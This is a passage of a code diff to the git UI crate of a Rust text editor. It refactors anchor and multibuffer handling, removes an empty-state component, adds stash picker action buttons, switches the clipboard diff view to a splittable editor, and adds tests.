a/crates/git_ui/src/project_diff.rs +++ b/crates/git_ui/src/project_diff.rs @@ -2,7 +2,6 @@ use crate::{ conflict_view::ConflictAddon, git_panel::{GitPanel, GitPanelAddon, GitStatusEntry}, git_panel_settings::GitPanelSettings, - remote_button::{render_publish_button, render_push_button}, resolve_active_repository, }; use agent_settings::AgentSettings; @@ -18,8 +17,7 @@ use editor::{ use git::repository::DiffType; use git::{ - Commit, StageAll, StageAndNext, ToggleStaged, UnstageAll, UnstageAndNext, - repository::{Branch, RepoPath, Upstream, UpstreamTracking, UpstreamTrackingStatus}, + Commit, StageAll, StageAndNext, ToggleStaged, UnstageAll, UnstageAndNext, repository::RepoPath, status::FileStatus, }; use gpui::{ @@ -503,9 +501,11 @@ impl ProjectDiff { pub fn active_path(&self, cx: &App) -> Option { let editor = self.editor.read(cx).focused_editor().read(cx); + let multibuffer = editor.buffer().read(cx); let position = editor.selections.newest_anchor().head(); - let multi_buffer = editor.buffer().read(cx); - let (_, buffer, _) = multi_buffer.excerpt_containing(position, cx)?; + let snapshot = multibuffer.snapshot(cx); + let (text_anchor, _) = snapshot.anchor_to_buffer_anchor(position)?; + let buffer = multibuffer.buffer(text_anchor.buffer_id)?; let file = buffer.read(cx).file()?; Some(ProjectPath { @@ -517,7 +517,9 @@ impl ProjectDiff { fn move_to_beginning(&mut self, window: &mut Window, cx: &mut Context) { self.editor.update(cx, |editor, cx| { editor.rhs_editor().update(cx, |editor, cx| { - editor.move_to_beginning(&Default::default(), window, cx); + editor.change_selections(Default::default(), window, cx, |s| { + s.select_ranges(vec![multi_buffer::Anchor::Min..multi_buffer::Anchor::Min]); + }); }); }); } @@ -542,38 +544,7 @@ impl ProjectDiff { } pub fn calculate_changed_lines(&self, cx: &App) -> (u32, u32) { - let snapshot = self.multibuffer.read(cx).snapshot(cx); - let mut total_additions = 0u32; - let mut total_deletions = 0u32; - - let mut seen_buffers = 
HashSet::default(); - for (_, buffer, _) in snapshot.excerpts() { - let buffer_id = buffer.remote_id(); - if !seen_buffers.insert(buffer_id) { - continue; - } - - let Some(diff) = snapshot.diff_for_buffer_id(buffer_id) else { - continue; - }; - - let base_text = diff.base_text(); - - for hunk in diff.hunks_intersecting_range(Anchor::MIN..Anchor::MAX, buffer) { - let added_rows = hunk.range.end.row.saturating_sub(hunk.range.start.row); - total_additions += added_rows; - - let base_start = base_text - .offset_to_point(hunk.diff_base_byte_range.start) - .row; - let base_end = base_text.offset_to_point(hunk.diff_base_byte_range.end).row; - let deleted_rows = base_end.saturating_sub(base_start); - - total_deletions += deleted_rows; - } - } - - (total_additions, total_deletions) + self.multibuffer.read(cx).snapshot(cx).total_changed_lines() } /// Returns the total count of review comments across all hunks/files. @@ -598,17 +569,17 @@ impl ProjectDiff { .collect::>(); if !ranges.iter().any(|range| range.start != range.end) { selection = false; - if let Some((excerpt_id, _, range)) = self - .editor - .read(cx) - .rhs_editor() - .read(cx) - .active_excerpt(cx) + let anchor = editor.selections.newest_anchor().head(); + if let Some((_, excerpt_range)) = snapshot.excerpt_containing(anchor..anchor) + && let Some(range) = snapshot + .anchor_in_buffer(excerpt_range.context.start) + .zip(snapshot.anchor_in_buffer(excerpt_range.context.end)) + .map(|(start, end)| start..end) { - ranges = vec![multi_buffer::Anchor::range_in_buffer(excerpt_id, range)]; + ranges = vec![range]; } else { ranges = Vec::default(); - } + }; } let mut has_staged_hunks = false; let mut has_unstaged_hunks = false; @@ -744,7 +715,7 @@ impl ProjectDiff { let (was_empty, is_excerpt_newly_added) = self.editor.update(cx, |editor, cx| { let was_empty = editor.rhs_editor().read(cx).buffer().read(cx).is_empty(); - let (_, is_newly_added) = editor.set_excerpts_for_path( + let is_newly_added = 
editor.update_excerpts_for_path( path_key.clone(), buffer, excerpt_ranges, @@ -764,7 +735,7 @@ impl ProjectDiff { cx, |selections| { selections.select_ranges([ - multi_buffer::Anchor::min()..multi_buffer::Anchor::min() + multi_buffer::Anchor::Min..multi_buffer::Anchor::Min ]) }, ); @@ -814,8 +785,9 @@ impl ProjectDiff { let mut previous_paths = this .multibuffer .read(cx) - .paths() - .cloned() + .snapshot(cx) + .buffers_with_paths() + .map(|(_, path_key)| path_key.clone()) .collect::>(); if let Some(repo) = repo { @@ -906,10 +878,23 @@ impl ProjectDiff { #[cfg(any(test, feature = "test-support"))] pub fn excerpt_paths(&self, cx: &App) -> Vec> { - self.multibuffer + let snapshot = self + .editor() + .read(cx) + .rhs_editor() + .read(cx) + .buffer() .read(cx) - .paths() - .map(|key| key.path.clone()) + .snapshot(cx); + snapshot + .excerpts() + .map(|excerpt| { + snapshot + .path_for_buffer(excerpt.context.start.buffer_id) + .unwrap() + .path + .clone() + }) .collect() } } @@ -1217,8 +1202,9 @@ impl SerializableItem for ProjectDiff { window: &mut Window, cx: &mut App, ) -> Task>> { + let db = persistence::ProjectDiffDb::global(cx); window.spawn(cx, async move |cx| { - let diff_base = persistence::PROJECT_DIFF_DB.get_diff_base(item_id, workspace_id)?; + let diff_base = db.get_diff_base(item_id, workspace_id)?; let diff = cx.update(|window, cx| { let branch_diff = cx @@ -1244,10 +1230,10 @@ impl SerializableItem for ProjectDiff { let workspace_id = workspace.database_id()?; let diff_base = self.diff_base(cx).clone(); + let db = persistence::ProjectDiffDb::global(cx); Some(cx.background_spawn({ async move { - persistence::PROJECT_DIFF_DB - .save_diff_base(item_id, workspace_id, diff_base.clone()) + db.save_diff_base(item_id, workspace_id, diff_base.clone()) .await } })) @@ -1287,7 +1273,7 @@ mod persistence { )]; } - db::static_connection!(PROJECT_DIFF_DB, ProjectDiffDb, [WorkspaceDb]); + db::static_connection!(ProjectDiffDb, [WorkspaceDb]); impl ProjectDiffDb { pub 
async fn save_diff_base( @@ -1590,8 +1576,11 @@ fn render_send_review_to_agent_button(review_count: usize, focus_handle: &FocusH "send-review", format!("Send Review to Agent ({})", review_count), ) - .icon(IconName::ZedAssistant) - .icon_position(IconPosition::Start) + .start_icon( + Icon::new(IconName::ZedAssistant) + .size(IconSize::Small) + .color(Color::Muted), + ) .tooltip(Tooltip::for_action_title_in( "Send all review comments to the Agent panel", &SendReviewToAgent, @@ -1684,10 +1673,11 @@ impl Render for BranchDiffToolbar { let focus_handle = focus_handle.clone(); this.child(Divider::vertical()).child( Button::new("review-diff", "Review Diff") - .icon(IconName::ZedAssistant) - .icon_position(IconPosition::Start) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) + .start_icon( + Icon::new(IconName::ZedAssistant) + .size(IconSize::Small) + .color(Color::Muted), + ) .key_binding(KeyBinding::for_action_in(&ReviewDiff, &focus_handle, cx)) .tooltip(move |_, cx| { Tooltip::with_meta_in( @@ -1715,254 +1705,6 @@ impl Render for BranchDiffToolbar { } } -#[derive(IntoElement, RegisterComponent)] -pub struct ProjectDiffEmptyState { - pub no_repo: bool, - pub can_push_and_pull: bool, - pub focus_handle: Option, - pub current_branch: Option, - // has_pending_commits: bool, - // ahead_of_remote: bool, - // no_git_repository: bool, -} - -impl RenderOnce for ProjectDiffEmptyState { - fn render(self, _window: &mut Window, cx: &mut App) -> impl IntoElement { - let status_against_remote = |ahead_by: usize, behind_by: usize| -> bool { - matches!(self.current_branch, Some(Branch { - upstream: - Some(Upstream { - tracking: - UpstreamTracking::Tracked(UpstreamTrackingStatus { - ahead, behind, .. - }), - .. - }), - .. 
- }) if (ahead > 0) == (ahead_by > 0) && (behind > 0) == (behind_by > 0)) - }; - - let change_count = |current_branch: &Branch| -> (usize, usize) { - match current_branch { - Branch { - upstream: - Some(Upstream { - tracking: - UpstreamTracking::Tracked(UpstreamTrackingStatus { - ahead, behind, .. - }), - .. - }), - .. - } => (*ahead as usize, *behind as usize), - _ => (0, 0), - } - }; - - let not_ahead_or_behind = status_against_remote(0, 0); - let ahead_of_remote = status_against_remote(1, 0); - let branch_not_on_remote = if let Some(branch) = self.current_branch.as_ref() { - branch.upstream.is_none() - } else { - false - }; - - let has_branch_container = |branch: &Branch| { - h_flex() - .max_w(px(420.)) - .bg(cx.theme().colors().text.opacity(0.05)) - .border_1() - .border_color(cx.theme().colors().border) - .rounded_sm() - .gap_8() - .px_6() - .py_4() - .map(|this| { - if ahead_of_remote { - let ahead_count = change_count(branch).0; - let ahead_string = format!("{} Commits Ahead", ahead_count); - this.child( - v_flex() - .child(Headline::new(ahead_string).size(HeadlineSize::Small)) - .child( - Label::new(format!("Push your changes to {}", branch.name())) - .color(Color::Muted), - ), - ) - .child(div().child(render_push_button( - self.focus_handle, - "push".into(), - ahead_count as u32, - ))) - } else if branch_not_on_remote { - this.child( - v_flex() - .child(Headline::new("Publish Branch").size(HeadlineSize::Small)) - .child( - Label::new(format!("Create {} on remote", branch.name())) - .color(Color::Muted), - ), - ) - .child( - div().child(render_publish_button(self.focus_handle, "publish".into())), - ) - } else { - this.child(Label::new("Remote status unknown").color(Color::Muted)) - } - }) - }; - - v_flex().size_full().items_center().justify_center().child( - v_flex() - .gap_1() - .when(self.no_repo, |this| { - this.text_center() - .child(Label::new("No Repository").color(Color::Muted)) - .child( - Button::new("initialize-repo", "Initialize Repository") - 
.on_click(move |_, _, cx| cx.dispatch_action(&git::Init)), - ) - }) - .map(|this| { - if not_ahead_or_behind && self.current_branch.is_some() { - this.text_center() - .child(Label::new("No Changes").color(Color::Muted)) - } else { - this.when_some(self.current_branch.as_ref(), |this, branch| { - this.child(has_branch_container(branch)) - }) - } - }), - ) - } -} - -mod preview { - use git::repository::{ - Branch, CommitSummary, Upstream, UpstreamTracking, UpstreamTrackingStatus, - }; - use ui::prelude::*; - - use super::ProjectDiffEmptyState; - - // View this component preview using `workspace: open component-preview` - impl Component for ProjectDiffEmptyState { - fn scope() -> ComponentScope { - ComponentScope::VersionControl - } - - fn preview(_window: &mut Window, _cx: &mut App) -> Option { - let unknown_upstream: Option = None; - let ahead_of_upstream: Option = Some( - UpstreamTrackingStatus { - ahead: 2, - behind: 0, - } - .into(), - ); - - let not_ahead_or_behind_upstream: Option = Some( - UpstreamTrackingStatus { - ahead: 0, - behind: 0, - } - .into(), - ); - - fn branch(upstream: Option) -> Branch { - Branch { - is_head: true, - ref_name: "some-branch".into(), - upstream: upstream.map(|tracking| Upstream { - ref_name: "origin/some-branch".into(), - tracking, - }), - most_recent_commit: Some(CommitSummary { - sha: "abc123".into(), - subject: "Modify stuff".into(), - commit_timestamp: 1710932954, - author_name: "John Doe".into(), - has_parent: true, - }), - } - } - - let no_repo_state = ProjectDiffEmptyState { - no_repo: true, - can_push_and_pull: false, - focus_handle: None, - current_branch: None, - }; - - let no_changes_state = ProjectDiffEmptyState { - no_repo: false, - can_push_and_pull: true, - focus_handle: None, - current_branch: Some(branch(not_ahead_or_behind_upstream)), - }; - - let ahead_of_upstream_state = ProjectDiffEmptyState { - no_repo: false, - can_push_and_pull: true, - focus_handle: None, - current_branch: Some(branch(ahead_of_upstream)), - 
}; - - let unknown_upstream_state = ProjectDiffEmptyState { - no_repo: false, - can_push_and_pull: true, - focus_handle: None, - current_branch: Some(branch(unknown_upstream)), - }; - - let (width, height) = (px(480.), px(320.)); - - Some( - v_flex() - .gap_6() - .children(vec![ - example_group(vec![ - single_example( - "No Repo", - div() - .w(width) - .h(height) - .child(no_repo_state) - .into_any_element(), - ), - single_example( - "No Changes", - div() - .w(width) - .h(height) - .child(no_changes_state) - .into_any_element(), - ), - single_example( - "Unknown Upstream", - div() - .w(width) - .h(height) - .child(unknown_upstream_state) - .into_any_element(), - ), - single_example( - "Ahead of Remote", - div() - .w(width) - .h(height) - .child(ahead_of_upstream_state) - .into_any_element(), - ), - ]) - .vertical(), - ]) - .into_any_element(), - ) - } - } -} - struct BranchDiffAddon { branch_diff: Entity, } @@ -2018,7 +1760,7 @@ mod tests { settings.editor.diff_view_style = Some(DiffViewStyle::Unified); }); }); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); editor::init(cx); crate::init(cx); }); @@ -2209,7 +1951,7 @@ mod tests { let snapshot = buffer_editor.snapshot(window, cx); let snapshot = &snapshot.buffer_snapshot(); let prev_buffer_hunks = buffer_editor - .diff_hunks_in_ranges(&[editor::Anchor::min()..editor::Anchor::max()], snapshot) + .diff_hunks_in_ranges(&[editor::Anchor::Min..editor::Anchor::Max], snapshot) .collect::>(); buffer_editor.git_restore(&Default::default(), window, cx); prev_buffer_hunks @@ -2222,7 +1964,7 @@ mod tests { let snapshot = buffer_editor.snapshot(window, cx); let snapshot = &snapshot.buffer_snapshot(); buffer_editor - .diff_hunks_in_ranges(&[editor::Anchor::min()..editor::Anchor::max()], snapshot) + .diff_hunks_in_ranges(&[editor::Anchor::Min..editor::Anchor::Max], snapshot) .collect::>() }); assert_eq!(new_buffer_hunks.as_slice(), &[]); @@ -2481,9 +2223,14 @@ mod tests { 
cx.update(|window, cx| { let editor = diff.read(cx).editor.read(cx).rhs_editor().clone(); - let excerpt_ids = editor.read(cx).buffer().read(cx).excerpt_ids(); - assert_eq!(excerpt_ids.len(), 1); - let excerpt_id = excerpt_ids[0]; + let excerpts = editor + .read(cx) + .buffer() + .read(cx) + .snapshot(cx) + .excerpts() + .collect::>(); + assert_eq!(excerpts.len(), 1); let buffer = editor .read(cx) .buffer() @@ -2511,7 +2258,6 @@ mod tests { resolve_conflict( editor.downgrade(), - excerpt_id, snapshot.conflicts[0].clone(), vec![ours_range], window, diff --git a/crates/git_ui/src/stash_picker.rs b/crates/git_ui/src/stash_picker.rs index e736dd806a35703991e1fb51e27e3952e5692d99..2d3515e833e4d353c323f533f1f0f39bb1d76561 100644 --- a/crates/git_ui/src/stash_picker.rs +++ b/crates/git_ui/src/stash_picker.rs @@ -468,7 +468,7 @@ impl PickerDelegate for StashListDelegate { ix: usize, selected: bool, _window: &mut Window, - _cx: &mut Context>, + cx: &mut Context>, ) -> Option { let entry_match = &self.matches[ix]; @@ -501,16 +501,66 @@ impl PickerDelegate for StashListDelegate { .size(LabelSize::Small), ); + let view_button = { + let focus_handle = self.focus_handle.clone(); + IconButton::new(("view-stash", ix), IconName::Eye) + .icon_size(IconSize::Small) + .tooltip(move |_, cx| { + Tooltip::for_action_in("View Stash", &ShowStashItem, &focus_handle, cx) + }) + .on_click(cx.listener(move |this, _, window, cx| { + this.delegate.show_stash_at(ix, window, cx); + })) + }; + + let pop_button = { + let focus_handle = self.focus_handle.clone(); + IconButton::new(("pop-stash", ix), IconName::MaximizeAlt) + .icon_size(IconSize::Small) + .tooltip(move |_, cx| { + Tooltip::for_action_in("Pop Stash", &menu::SecondaryConfirm, &focus_handle, cx) + }) + .on_click(|_, window, cx| { + window.dispatch_action(menu::SecondaryConfirm.boxed_clone(), cx); + }) + }; + + let drop_button = { + let focus_handle = self.focus_handle.clone(); + IconButton::new(("drop-stash", ix), IconName::Trash) + 
.icon_size(IconSize::Small) + .tooltip(move |_, cx| { + Tooltip::for_action_in("Drop Stash", &DropStashItem, &focus_handle, cx) + }) + .on_click(cx.listener(move |this, _, window, cx| { + this.delegate.drop_stash_at(ix, window, cx); + })) + }; + Some( ListItem::new(format!("stash-{ix}")) .inset(true) .spacing(ListItemSpacing::Sparse) .toggle_state(selected) - .child(v_flex().w_full().child(stash_label).child(branch_info)) - .tooltip(Tooltip::text(format!( - "stash@{{{}}}", - entry_match.entry.index - ))), + .child( + h_flex() + .w_full() + .gap_2p5() + .child( + Icon::new(IconName::BoxOpen) + .size(IconSize::Small) + .color(Color::Muted), + ) + .child(div().w_full().child(stash_label).child(branch_info)), + ) + .end_slot( + h_flex() + .gap_0p5() + .child(view_button) + .child(pop_button) + .child(drop_button), + ) + .show_end_slot_on_hover(), ) } @@ -519,6 +569,10 @@ impl PickerDelegate for StashListDelegate { } fn render_footer(&self, _: &mut Window, cx: &mut Context>) -> Option { + if self.matches.is_empty() { + return None; + } + let focus_handle = self.focus_handle.clone(); Some( @@ -602,7 +656,7 @@ mod tests { let settings_store = SettingsStore::test(cx); cx.set_global(settings_store); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); editor::init(cx); }) } diff --git a/crates/git_ui/src/text_diff_view.rs b/crates/git_ui/src/text_diff_view.rs index 1419fa049ee2aae1992dac517aad8371800ac532..fe2add8177e2c9ca92eb8d08776d561e1adaba91 100644 --- a/crates/git_ui/src/text_diff_view.rs +++ b/crates/git_ui/src/text_diff_view.rs @@ -2,14 +2,18 @@ use anyhow::Result; use buffer_diff::BufferDiff; -use editor::{Editor, EditorEvent, MultiBuffer, ToPoint, actions::DiffClipboardWithSelectionData}; +use editor::{ + Editor, EditorEvent, EditorSettings, MultiBuffer, SplittableEditor, ToPoint, + actions::DiffClipboardWithSelectionData, +}; use futures::{FutureExt, select_biased}; use gpui::{ AnyElement, App, AppContext as _, 
AsyncApp, Context, Entity, EventEmitter, FocusHandle, Focusable, IntoElement, Render, Task, Window, }; -use language::{self, Buffer, Point}; +use language::{self, Buffer, OffsetRangeExt, Point}; use project::Project; +use settings::Settings; use std::{ any::{Any, TypeId}, cmp, @@ -22,13 +26,13 @@ use ui::{Color, Icon, IconName, Label, LabelCommon as _, SharedString}; use util::paths::PathExt; use workspace::{ - Item, ItemHandle as _, ItemNavHistory, Workspace, + Item, ItemNavHistory, Workspace, item::{ItemEvent, SaveOptions, TabContentParams}, searchable::SearchableItemHandle, }; pub struct TextDiffView { - diff_editor: Entity, + diff_editor: Entity, title: SharedString, path: Option, buffer_changes_tx: watch::Sender<()>, @@ -47,27 +51,27 @@ impl TextDiffView { let source_editor = diff_data.editor.clone(); let selection_data = source_editor.update(cx, |editor, cx| { - let multibuffer = editor.buffer().read(cx); - let source_buffer = multibuffer.as_singleton()?; - let selections = editor.selections.all::(&editor.display_snapshot(cx)); - let buffer_snapshot = source_buffer.read(cx); - let first_selection = selections.first()?; - let max_point = buffer_snapshot.max_point(); - - if first_selection.is_empty() { + let multibuffer = editor.buffer(); + let multibuffer_snapshot = multibuffer.read(cx).snapshot(cx); + let first_selection = editor.selections.newest_anchor(); + + let (source_buffer, buffer_range) = multibuffer_snapshot + .anchor_range_to_buffer_anchor_range(first_selection.range())?; + let max_point = source_buffer.max_point(); + let buffer_range = buffer_range.to_point(source_buffer); + let source_buffer = multibuffer.read(cx).buffer(source_buffer.remote_id())?; + + if buffer_range.is_empty() { let full_range = Point::new(0, 0)..max_point; return Some((source_buffer, full_range)); } - let start = first_selection.start; - let end = first_selection.end; - let expanded_start = Point::new(start.row, 0); - - let expanded_end = if end.column > 0 { - let next_row = 
end.row + 1; + let expanded_start = Point::new(buffer_range.start.row, 0); + let expanded_end = if buffer_range.end.column > 0 { + let next_row = buffer_range.end.row + 1; cmp::min(max_point, Point::new(next_row, 0)) } else { - end + buffer_range.end }; Some((source_buffer, expanded_start..expanded_end)) }); @@ -78,11 +82,24 @@ impl TextDiffView { }; source_editor.update(cx, |source_editor, cx| { - source_editor.change_selections(Default::default(), window, cx, |s| { - s.select_ranges(vec![ - expanded_selection_range.start..expanded_selection_range.end, - ]); - }) + let multibuffer = source_editor.buffer(); + let mb_range = { + let mb = multibuffer.read(cx); + let start_anchor = + mb.buffer_point_to_anchor(&source_buffer, expanded_selection_range.start, cx); + let end_anchor = + mb.buffer_point_to_anchor(&source_buffer, expanded_selection_range.end, cx); + start_anchor.zip(end_anchor).map(|(s, e)| { + let snapshot = mb.snapshot(cx); + s.to_point(&snapshot)..e.to_point(&snapshot) + }) + }; + + if let Some(range) = mb_range { + source_editor.change_selections(Default::default(), window, cx, |s| { + s.select_ranges(vec![range]); + }); + } }); let source_buffer_snapshot = source_buffer.read(cx).snapshot(); @@ -102,11 +119,11 @@ impl TextDiffView { ); let task = window.spawn(cx, async move |cx| { - let project = workspace.update(cx, |workspace, _| workspace.project().clone())?; - update_diff_buffer(&diff_buffer, &source_buffer, &clipboard_buffer, cx).await?; workspace.update_in(cx, |workspace, window, cx| { + let project = workspace.project().clone(); + let workspace_entity = cx.entity(); let diff_view = cx.new(|cx| { TextDiffView::new( clipboard_buffer, @@ -115,6 +132,7 @@ impl TextDiffView { expanded_selection_range, diff_buffer, project, + workspace_entity, window, cx, ) @@ -139,6 +157,7 @@ impl TextDiffView { source_range: Range, diff_buffer: Entity, project: Entity, + workspace: Entity, window: &mut Window, cx: &mut Context, ) -> Self { @@ -151,21 +170,30 @@ impl 
TextDiffView { multibuffer }); let diff_editor = cx.new(|cx| { - let mut editor = Editor::for_multibuffer(multibuffer, Some(project), window, cx); - editor.start_temporary_diff_override(); - editor.disable_diagnostics(cx); - editor.set_expand_all_diff_hunks(cx); - editor.set_render_diff_hunk_controls( + let splittable = SplittableEditor::new( + EditorSettings::get_global(cx).diff_view_style, + multibuffer, + project, + workspace, + window, + cx, + ); + splittable.set_render_diff_hunk_controls( Arc::new(|_, _, _, _, _, _, _, _| gpui::Empty.into_any_element()), cx, ); - editor + splittable.rhs_editor().update(cx, |editor, cx| { + editor.start_temporary_diff_override(); + editor.disable_diagnostics(cx); + editor.set_expand_all_diff_hunks(cx); + }); + splittable }); let (buffer_changes_tx, mut buffer_changes_rx) = watch::channel(()); cx.subscribe(&source_buffer, move |this, _, event, _| match event { - language::BufferEvent::Edited + language::BufferEvent::Edited { .. } | language::BufferEvent::LanguageChanged(_) | language::BufferEvent::Reparsed => { this.buffer_changes_tx.send(()).ok(); @@ -329,12 +357,14 @@ impl Item for TextDiffView { &'a self, type_id: TypeId, self_handle: &'a Entity, - _: &'a App, + cx: &'a App, ) -> Option { if type_id == TypeId::of::() { Some(self_handle.clone().into()) - } else if type_id == TypeId::of::() { + } else if type_id == TypeId::of::() { Some(self.diff_editor.clone().into()) + } else if type_id == TypeId::of::() { + Some(self.diff_editor.read(cx).rhs_editor().clone().into()) } else { None } @@ -349,7 +379,7 @@ impl Item for TextDiffView { cx: &App, f: &mut dyn FnMut(gpui::EntityId, &dyn project::ProjectItem), ) { - self.diff_editor.for_each_project_item(cx, f) + self.diff_editor.read(cx).for_each_project_item(cx, f) } fn set_nav_history( @@ -358,7 +388,8 @@ impl Item for TextDiffView { _: &mut Window, cx: &mut Context, ) { - self.diff_editor.update(cx, |editor, _| { + let rhs = self.diff_editor.read(cx).rhs_editor().clone(); + 
rhs.update(cx, |editor, _| { editor.set_nav_history(Some(nav_history)); }); } @@ -439,11 +470,12 @@ impl Render for TextDiffView { #[cfg(test)] mod tests { use super::*; - use editor::{MultiBufferOffset, test::editor_test_context::assert_state_with_diff}; - use gpui::{TestAppContext, VisualContext}; + use editor::{MultiBufferOffset, PathKey, test::editor_test_context::assert_state_with_diff}; + use gpui::{BorrowAppContext, TestAppContext, VisualContext}; + use language::Point; use project::{FakeFs, Project}; use serde_json::json; - use settings::SettingsStore; + use settings::{DiffViewStyle, SettingsStore}; use unindent::unindent; use util::{path, test::marked_text_ranges}; use workspace::MultiWorkspace; @@ -452,7 +484,12 @@ mod tests { cx.update(|cx| { let settings_store = SettingsStore::test(cx); cx.set_global(settings_store); - theme::init(theme::LoadThemes::JustBase, cx); + cx.update_global::(|store, cx| { + store.update_user_settings(cx, |settings| { + settings.editor.diff_view_style = Some(DiffViewStyle::Unified); + }); + }); + theme_settings::init(theme::LoadThemes::JustBase, cx); }); } @@ -643,6 +680,185 @@ mod tests { .await; } + #[gpui::test] + async fn test_diffing_clipboard_from_multibuffer_with_selection(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + path!("/project"), + json!({ + "a.txt": "alpha\nbeta\ngamma", + "b.txt": "one\ntwo\nthree" + }), + ) + .await; + + let project = Project::test(fs, [path!("/project").as_ref()], cx).await; + + let buffer_a = project + .update(cx, |project, cx| { + project.open_local_buffer(path!("/project/a.txt"), cx) + }) + .await + .unwrap(); + let buffer_b = project + .update(cx, |project, cx| { + project.open_local_buffer(path!("/project/b.txt"), cx) + }) + .await + .unwrap(); + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = multi_workspace.read_with(cx, |mw, _| 
mw.workspace().clone()); + + let editor = cx.new_window_entity(|window, cx| { + let multibuffer = cx.new(|cx| { + let mut mb = MultiBuffer::new(language::Capability::ReadWrite); + mb.set_excerpts_for_path( + PathKey::sorted(0), + buffer_a.clone(), + [Point::new(0, 0)..Point::new(2, 5)], + 0, + cx, + ); + mb.set_excerpts_for_path( + PathKey::sorted(1), + buffer_b.clone(), + [Point::new(0, 0)..Point::new(2, 5)], + 0, + cx, + ); + mb + }); + + let mut editor = + Editor::for_multibuffer(multibuffer, Some(project.clone()), window, cx); + // Select "beta" inside the first excerpt + editor.change_selections(Default::default(), window, cx, |s| { + s.select_ranges([MultiBufferOffset(6)..MultiBufferOffset(10)]); + }); + editor + }); + + let diff_view = workspace + .update_in(cx, |workspace, window, cx| { + TextDiffView::open( + &DiffClipboardWithSelectionData { + clipboard_text: "REPLACED".to_string(), + editor, + }, + workspace, + window, + cx, + ) + }) + .unwrap() + .await + .unwrap(); + + cx.executor().run_until_parked(); + + diff_view.read_with(cx, |diff_view, _cx| { + assert!( + diff_view.title.contains("Clipboard"), + "diff view should have opened with a clipboard diff title, got: {}", + diff_view.title + ); + }); + } + + #[gpui::test] + async fn test_diffing_clipboard_from_multibuffer_with_empty_selection(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + path!("/project"), + json!({ + "a.txt": "alpha\nbeta\ngamma", + "b.txt": "one\ntwo\nthree" + }), + ) + .await; + + let project = Project::test(fs, [path!("/project").as_ref()], cx).await; + + let buffer_a = project + .update(cx, |project, cx| { + project.open_local_buffer(path!("/project/a.txt"), cx) + }) + .await + .unwrap(); + let buffer_b = project + .update(cx, |project, cx| { + project.open_local_buffer(path!("/project/b.txt"), cx) + }) + .await + .unwrap(); + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| 
MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()); + + let editor = cx.new_window_entity(|window, cx| { + let multibuffer = cx.new(|cx| { + let mut mb = MultiBuffer::new(language::Capability::ReadWrite); + mb.set_excerpts_for_path( + PathKey::sorted(0), + buffer_a.clone(), + [Point::new(0, 0)..Point::new(2, 5)], + 0, + cx, + ); + mb.set_excerpts_for_path( + PathKey::sorted(1), + buffer_b.clone(), + [Point::new(0, 0)..Point::new(2, 5)], + 0, + cx, + ); + mb + }); + + let mut editor = + Editor::for_multibuffer(multibuffer, Some(project.clone()), window, cx); + // Cursor inside the first excerpt (no selection) + editor.change_selections(Default::default(), window, cx, |s| { + s.select_ranges([MultiBufferOffset(6)..MultiBufferOffset(6)]); + }); + editor + }); + + let diff_view = workspace + .update_in(cx, |workspace, window, cx| { + TextDiffView::open( + &DiffClipboardWithSelectionData { + clipboard_text: "REPLACED".to_string(), + editor, + }, + workspace, + window, + cx, + ) + }) + .unwrap() + .await + .unwrap(); + + cx.executor().run_until_parked(); + + // Empty selection should diff the full underlying buffer + diff_view.read_with(cx, |diff_view, _cx| { + assert!( + diff_view.title.contains("Clipboard"), + "diff view should have opened with a clipboard diff title, got: {}", + diff_view.title + ); + }); + } + async fn base_test( project_root: &str, file_path: &str, @@ -715,7 +931,9 @@ mod tests { cx.executor().run_until_parked(); assert_state_with_diff( - &diff_view.read_with(cx, |diff_view, _| diff_view.diff_editor.clone()), + &diff_view.read_with(cx, |diff_view, cx| { + diff_view.diff_editor.read(cx).rhs_editor().clone() + }), cx, expected_diff, ); diff --git a/crates/git_ui/src/worktree_picker.rs b/crates/git_ui/src/worktree_picker.rs index f2826a2b543a73c5341653c42bbb5f1540213b2a..1b4497be1f4ea96bd4f0431c97bb538eda9faa57 100644 --- a/crates/git_ui/src/worktree_picker.rs +++ 
b/crates/git_ui/src/worktree_picker.rs @@ -2,7 +2,7 @@ use anyhow::Context as _; use collections::HashSet; use fuzzy::StringMatchCandidate; -use git::repository::{Worktree as GitWorktree, validate_worktree_directory}; +use git::repository::Worktree as GitWorktree; use gpui::{ Action, App, AsyncWindowContext, Context, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable, InteractiveElement, IntoElement, Modifiers, ModifiersChangedEvent, ParentElement, @@ -18,11 +18,22 @@ use remote::{RemoteConnectionOptions, remote_client::ConnectionIdentifier}; use remote_connection::{RemoteConnectionModal, connect}; use settings::Settings; use std::{path::PathBuf, sync::Arc}; -use ui::{HighlightedLabel, KeyBinding, ListItem, ListItemSpacing, prelude::*}; -use util::ResultExt; -use workspace::{ModalView, MultiWorkspace, Workspace, notifications::DetachAndPromptErr}; +use ui::{HighlightedLabel, KeyBinding, ListItem, ListItemSpacing, Tooltip, prelude::*}; +use util::{ResultExt, debug_panic}; +use workspace::{ + ModalView, MultiWorkspace, OpenMode, Workspace, notifications::DetachAndPromptErr, +}; + +use crate::git_panel::show_error_toast; -actions!(git, [WorktreeFromDefault, WorktreeFromDefaultOnWindow]); +actions!( + git, + [ + WorktreeFromDefault, + WorktreeFromDefaultOnWindow, + DeleteWorktree + ] +); pub fn open( workspace: &mut Workspace, @@ -87,9 +98,12 @@ impl WorktreeList { }); cx.spawn_in(window, async move |this, cx| { - let all_worktrees = all_worktrees_request + let all_worktrees: Vec<_> = all_worktrees_request .context("No active repository")? - .await??; + .await?? + .into_iter() + .filter(|worktree| worktree.ref_name.is_some()) // hide worktrees without a branch + .collect(); let default_branch = default_branch_request .context("No active repository")? 
